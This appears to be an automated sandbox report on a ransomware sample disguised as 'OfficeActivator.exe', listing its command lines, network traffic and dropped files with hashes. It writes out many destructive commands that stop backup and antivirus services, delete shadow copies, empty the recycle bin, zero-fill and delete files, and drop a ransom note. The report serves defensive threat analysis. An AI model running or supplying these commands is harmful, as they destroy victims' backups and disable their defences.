C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentBrowser /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecVSSProvider /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop AcrSch2Svc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop CAARCUpdateSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop sophos /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecManagementService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecRPCService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop CASAD2DWebSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop PDVFSService /y

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\OfficeActivator.exe

C:\Windows\system32\PING.EXE

ping 127.0.0.7 -n 3

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=524288 “%s”

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Windows\SYSTEM32\net.exe

"net.exe" stop avpsus /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop McAfeeDLPAgentService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop mfewc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BMR Boot Service /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop NetBackup BMR MTFTP Service /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop DefWatch /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop ccEvtMgr /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop ccSetMgr /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop SavRoam /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop RTVscan /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop QBFCService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop QBIDPService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop Intuit.QuickBooks.FCS /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop QBCFMonitorService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop YooBackup /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop YooIT /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop zhudongfangyu /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop stc_raw_agent /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VSNAPVSS /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VeeamTransportSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VeeamDeploymentService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VeeamNFSSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop veeam /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop PDVFSService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecVSSProvider /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecAgentAccelerator /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecAgentBrowser /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecDiveciMediaService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecJobEngine /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecManagementService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecRPCService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop AcrSch2Svc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop AcronisAgent /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop CASAD2DWebSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop CAARCUpdateSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop sophos /y

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLTELEMETRY start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLWriter start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SstpSvc start= disabled

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mspub.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mydesktopqos.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mydesktopservice.exe /F

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" Delete Shadows /all /quiet

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" Delete Shadows /all /quiet

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BMR Boot Service /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop McAfeeDLPAgentService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop mfewc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop ccEvtMgr /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop ccSetMgr /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop avpsus /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBFCService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBIDPService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop DefWatch /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SavRoam /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop YooBackup /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop YooIT /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop CAARCUpdateSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop AcrSch2Svc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamNFSSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecVSSProvider /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop PDVFSService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop stc_raw_agent /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop zhudongfangyu /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VSNAPVSS /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop RTVscan /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentBrowser /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop veeam /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop CASAD2DWebSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecJobEngine /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamTransportSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBCFMonitorService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop sophos /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamDeploymentService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecManagementService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop AcronisAgent /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecRPCService /y

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\OfficeActivator.exe

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=524288 “%s”

C:\Windows\system32\PING.EXE

ping 127.0.0.7 -n 3

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 mega.nz udp
US 8.8.8.8:53 mega.nz udp
LU 31.216.144.5:443 mega.nz tcp
LU 31.216.144.5:443 mega.nz tcp
US 8.8.8.8:53 eu.static.mega.co.nz udp
NL 66.203.127.11:443 eu.static.mega.co.nz tcp
NL 66.203.127.11:443 eu.static.mega.co.nz tcp
US 8.8.8.8:53 41.242.123.52.in-addr.arpa udp
US 8.8.8.8:53 5.144.216.31.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 11.127.203.66.in-addr.arpa udp
US 8.8.8.8:53 g.api.mega.co.nz udp
LU 66.203.125.15:443 g.api.mega.co.nz tcp
LU 66.203.125.15:443 g.api.mega.co.nz tcp
US 8.8.8.8:53 15.125.203.66.in-addr.arpa udp
NL 66.203.127.11:443 eu.static.mega.co.nz tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 gfs440n014.userstorage.mega.co.nz udp
JP 103.99.35.14:443 gfs440n014.userstorage.mega.co.nz tcp
JP 103.99.35.14:443 gfs440n014.userstorage.mega.co.nz tcp
US 8.8.8.8:53 14.35.99.103.in-addr.arpa udp
GB 92.123.128.189:443 www.bing.com tcp
US 8.8.8.8:53 189.128.123.92.in-addr.arpa udp
US 8.8.8.8:53 tip.neiki.dev udp
US 172.67.70.37:80 tip.neiki.dev tcp
US 172.67.70.37:80 tip.neiki.dev tcp
US 172.67.70.37:443 tip.neiki.dev tcp
US 8.8.8.8:53 static.cloudflareinsights.com udp
US 104.16.80.73:443 static.cloudflareinsights.com tcp
US 8.8.8.8:53 tipstatus.statuspage.io udp
DE 108.157.4.73:443 tipstatus.statuspage.io tcp
US 8.8.8.8:53 crt.rootg2.amazontrust.com udp
DE 18.154.63.32:80 crt.rootg2.amazontrust.com tcp
US 8.8.8.8:53 q72g5l27zzgc.statuspage.io udp
US 8.8.8.8:53 37.70.67.172.in-addr.arpa udp
US 8.8.8.8:53 73.80.16.104.in-addr.arpa udp
US 8.8.8.8:53 73.4.157.108.in-addr.arpa udp
US 8.8.8.8:53 32.63.154.18.in-addr.arpa udp
US 8.8.8.8:53 33.4.157.108.in-addr.arpa udp
US 8.8.8.8:53 api.iconify.design udp
US 104.26.13.204:443 api.iconify.design tcp
US 104.26.13.204:443 api.iconify.design tcp
US 104.26.13.204:443 api.iconify.design tcp
US 104.26.13.204:443 api.iconify.design tcp
US 104.26.13.204:443 api.iconify.design tcp
US 104.26.13.204:443 api.iconify.design tcp
US 8.8.8.8:53 204.13.26.104.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 cdn.neiki.dev udp
US 8.8.8.8:53 a.nel.cloudflare.com udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.179.228:443 www.google.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 www.poweradmin.com udp
US 52.1.55.52:443 www.poweradmin.com tcp
US 8.8.8.8:53 228.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 52.55.1.52.in-addr.arpa udp
N/A 10.127.255.255:3 udp
US 8.8.8.8:53 cutewallpaper.org udp
US 104.21.37.179:443 cutewallpaper.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 255.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 179.37.21.104.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
N/A 10.127.0.255:3 udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 52.1.55.52:443 www.poweradmin.com tcp
US 104.21.37.179:443 cutewallpaper.org tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 52.1.55.52:443 www.poweradmin.com tcp
US 104.21.37.179:443 cutewallpaper.org tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 52.1.55.52:443 www.poweradmin.com tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 ba6ef346187b40694d493da98d5da979
SHA1 643c15bec043f8673943885199bb06cd1652ee37
SHA256 d86eec91f295dfda8ed1c5fa99de426f2fe359282c7ebf67e3a40be739475d73
SHA512 2e6cc97330be8868d4b9c53be7e12c558f6eb1ac2c4080a611ba6c43561d0c5bb4791b8a11a8c2371599f0ba73ed1d9a7a2ea6dee2ae6a080f1912e0cb1f656c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 b8880802fc2bb880a7a869faa01315b0
SHA1 51d1a3fa2c272f094515675d82150bfce08ee8d3
SHA256 467b8cd4aacac66557712f9843023dcedefcc26efc746f3e44157bc8dac73812
SHA512 e1c6dba2579357ba70de58968b167d2c529534d24bff70568144270c48ac18a48ee2af2d58d78ae741e5a36958fa78a57955bd2456f1df00b781fc1002e123d2

\??\pipe\LOCAL\crashpad_4640_DPOTZRBQDYUULRHE

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 90ac735ccc112728c59b29485fcb6ac7
SHA1 dca6a4dd6ce8582db4436fd745668634366e17fe
SHA256 c46a60bb1d43de86df733ff92745a6b3fac1d40bd88eda2f4eefc95cb35990bc
SHA512 15b86623d35a19daf855a5680d496dd631e3ff8a302b43d092423dbe077880247568d22c051efa19a55c50367b335ccfcf3d8e3f01325cc3d2d4b47037a81f01

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 95596a28a2c122816f4b90f1134c90f9
SHA1 70a739ea3f46a79ca4f8f8a2e05d7e99fb29d158
SHA256 4e79c22a4db661db5bb91845d24fe777ab56e59a37dcefe0e97213bcfcc40065
SHA512 ca6ab71bb88ec101c3042bf4e3f415870570175e9e876042a343a39ef61ba9413d76d099abb6cbbc728412ef8e2b99dcf0bede86e5a92cc63d48f03a0986eabe

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e043448fe7cf84d6152554dfdd644fc6
SHA1 b63959fa66fd945143f175ea6457159dd78351b8
SHA256 1c43d4f3ef5896156ff9455398bd902a5509b8b52bbcef3b8bf7d62b8b39042c
SHA512 a6c42678c7f48b05f7c3d78b9aa5fde7347f1455ae215563af837483d5665d84469e85def182db3d6e0960e4c8fb363f4cc3927a2fdfca18b26e17e5d187974f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 282b1aa412b294f1068c5d649063cf08
SHA1 62ef016c6d02db2f9c873ac9f94afe4e5b6ec73d
SHA256 7ac2edce91a202a936481d7c71729c682bbdcfbd21f7d16da05a90db24bbb9de
SHA512 be53d21343b6ad1145dd98cd0ceaf92355be3bb7a81fe95abe5864e6aae3231acb8263a6d2548c169bacfc56ec2b1cae1b9f522076ea48f8e15362caecb08cf3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 5a55984a566a8b8279b4efbf1b1f3849
SHA1 e7a188eee0a70453172fdcebb43a14735a97438a
SHA256 f6bca04364595aa1b95fc152db50c2f58f72c8d336649a60fc1800a235c2f65e
SHA512 ff59dce272d10b2f5a75b745cdd6a9a52a12a5ae87eb99134eddb4bf68405ba74466e3fbfc6a9bb52116ba8aa4a14beeae0691c3f6b375f2ff79889e609025e0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57ddcd.TMP

MD5 07442de914ae8daa9f823ab79ee07c13
SHA1 7cd2ce125e0a297ce2258d90c5ce8f29da578628
SHA256 c144087003433560daad9bd06e64d38b30b67fa95a01a41fc92c0a767ff3d8d3
SHA512 3250fb0f246cfee83b5800b514a3057ccfe3b5ecd46e616e6c43a8d4391c615946ddcf1667bcdbf15ce349de73166c0046a101eaae01b73e3ee7c50c3ea82c96

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 ed54d6a7ac9cd9f067236f41ddd8aca9
SHA1 387b716e05a68a01ac294b046133885883b7959c
SHA256 3f52b2e6c4f32af738ac5287142a1939be79e3baa3e952b249ba37ceecc40dfb
SHA512 7edc0b6a62a069eef21c0ab5158e424581dc2914cfb4d45e234fff75d57924e7df25d2a3bc33dadcdfc8cd48803abc243a54b5956da899069ff7a5b52b43ba45

C:\Users\Admin\Downloads\OfficeActivator.exe

MD5 1b4e57be75e855e54e84f55874782d4b
SHA1 f5f17bae63faad537233bb38647940bda7340b2c
SHA256 8441f92e8460a7b2ed37ee96affe547a65589b2e8e980a18a6b08b786b48465d
SHA512 076245019b439583d4a45e46e6c836a2724270aba0a6e1b04e20c4157bdb32533045ee118c22a013e6f7127f1d34eb8b82738156dd152dae7c4ef9da1cf39da9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 a6bee2fb2f9ded51b48962a72bf0d940
SHA1 c796d46ff64bf0b39bd4acbe7342d52199539f0e
SHA256 82e3963f94d3be9ee396084fe5a2ed22f2dd2d41968aa92158b7d27f0da98e77
SHA512 6b0f1ab2d7704c8632b15314884d63b2c46601768ad5cf07f940961545a91e0298d78c25b275ca6738526aa5994e3c43a509aba2d3912fcad0ba5767e9c2d194

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 363c0e8450c81fe5be76e5934906ae36
SHA1 0f092c7c45e6983dacdf0196050dae84d68e269e
SHA256 9fd27cc7c8ad13bd1e0bdf0d5fcab75f4804f48a5367daa60d78aa2b26769034
SHA512 d28ea8447bdd0191aa0880b0d4d23f7774ba38f5536a241dbbf3d0533b2e1ab621881f73290d7201e911082d38a8e740cea7843db1fe412913d3307a7ce32397

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58170d.TMP

MD5 fa41970eceb5b7c8d21af2d2a5b4b561
SHA1 202c49d31973fd3d31c022bf45275d2c385f00fe
SHA256 0b23f145c5ff868f6f22a88fd0d602d956022e7a8cd3527bb193afff424881ca
SHA512 cc66e7888806216e2e2e5c87e9cdebf2a696835c7fe6beed38164c5cc13b04527df35da8a09b7a7e62535b72a1679cb3c8025a9170878a6ac4dfe2736027b047

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 eb4a42a14fef92c3acd66d98d8da545a
SHA1 5cefd1bbf574c0a5aa621454780298509147f54f
SHA256 14892dd8515f397565892526cd61e784af31aac4fd93fef929d97889809e46a5
SHA512 eaed57e8c7ee6a896462433b1f5de6f1a2b6792d7626f310e8efa9589277427c4bef6fa7b7c0eb31a67762557bb1b6236e3dbef825166de957c65b198e17a7c2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 d933556eb8f3bb05d3c2b8ab5ba7612f
SHA1 491c1e7a15008ed27352900e7fd61158c7474a97
SHA256 14947edd5b81b0fbda9339a0a2ef9fc2e5a026aea59c17f84be3b0ebd0e7f814
SHA512 4fafd51c98ea651eeba6d12e595c9d425b34d5e69b72577e51f2edab407f2153d22f1f0ad58c5c88788b45e4a885d75dfab994f39870acab45550cbf246e2d49

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 028a7e1de387c9199154a614c812bc06
SHA1 318eaab49db228dc2819a749039da6eeb05ac068
SHA256 e8786afbc551d05a65551b8ce4a159175eeade5fe9ca8f072e1ced135ecf536a
SHA512 05efd21e7d49f6b6d867df89e51342a2293686d60141a8eaf6adec951284df2135dcbfd6b70a90678bcd9c111ae7bd3576507d1102c7d6298d09e32290050c5e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\2463a69e-ce05-4ad0-b311-eb4722bbdb99.tmp

MD5 c5647520dc84526a1c0906ab1a362c40
SHA1 0a8f403a216426eeccf70e75e2a16c2b3dbda0bb
SHA256 86d553b1208bab41df1e0eaf378250af77099632293ba143a2d059042dac68c0
SHA512 5dab4b7ef40c4d9d2de7da744a7fa82f156661efbb6a49c3fe9811e4f0771764260527aa2db181e9c068b6abdc32cbc113e41770987735f4036aacdb07b3e000

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 6b2b91e7953b719cf84646529a822c6f
SHA1 27f00206939a5441b1fd5ecbadbd525755cd2659
SHA256 03633ed293eb831a9bb9fb524846d138a8609508496e8a14fc8e128bf46151a1
SHA512 925c5b8a33f06cb56429bd923423987eb69c929dc099fc9f0f0edfb68cb77dc5ceb030678d8be2847060918924a265f7e4330b107c2e98da626d80ee6aa3206b

memory/1676-464-0x0000000000870000-0x000000000088A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0i24erb4.pb4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5156-470-0x000002B325380000-0x000002B3253A2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ztqbqpbr.exe

MD5 b1dfb4f9eb3e598d1892a3bd3a92f079
SHA1 0fc135b131d0bb47c9a0aaf02490701303b76d3b
SHA256 ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb
SHA512 98454df86ddddf20e0b7bd19566006dbec431326e8aa57600aff460e9bec3e6489e43e95be3b252bf78a2edd5c203254508e9b55e756b680c100560664278ca2

C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

MD5 1abdf83963ae454a026008f34689a52e
SHA1 8e266c755d1ba08d864c8c5c9fcdcce40cc11cb0
SHA256 3697dfaf54d1065d5dafbb73ad3827f4e75faeb553495921528c93f65dd18979
SHA512 1c6f488566ad1df7d4ee0da28519afbca4556a2a0759d477c9affb0075a6919a378baeaa0699ff5f890d8fe33af2e1ac80179719957f6e7bb13cb1d0f5593224

C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta

MD5 d7471ba252ed7932174acec020112a56
SHA1 ed318a337230b78baa8496485cdd9f9e98cdf4a6
SHA256 e412c0093803d26c52b8149a043902c8f2ee05bb7a2d07b0f0b9017aa64d70ed
SHA512 80c8d61f4a21beefd55e696ac61d26b409d253d379dd5ca7406f80422e8dd817af7f0782674957f63514b4e86c2f9e6ed92a3a687b847ef48fe539e4cfacdd7b

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\OfficeActivator.exe.log

MD5 baf55b95da4a601229647f25dad12878
SHA1 abc16954ebfd213733c4493fc1910164d825cac8
SHA256 ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924
SHA512 24f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d3e9c29fe44e90aae6ed30ccf799ca8
SHA1 c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA256 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA512 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

C:\Users\Admin\AppData\Local\Temp\HOW_TO_DECYPHER_FILES.txt

MD5 e9eb3a155118e6c03e4e754d745eb2d8
SHA1 9ba57dfada739c057e5734310a5c4d1516eeb7e9
SHA256 f35fadcf3e807fe29b15092060c4499e0ab0ca5c888e7888847d603a4a64fe99
SHA512 f407e46f6dfb8757cd026c76d1e4129a6b6b6d04afe3412e470931d731d32300aae5ac5d2bcbb2a6209d2aed78353ea6cbb38707bcff40b537e388634077b94b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk

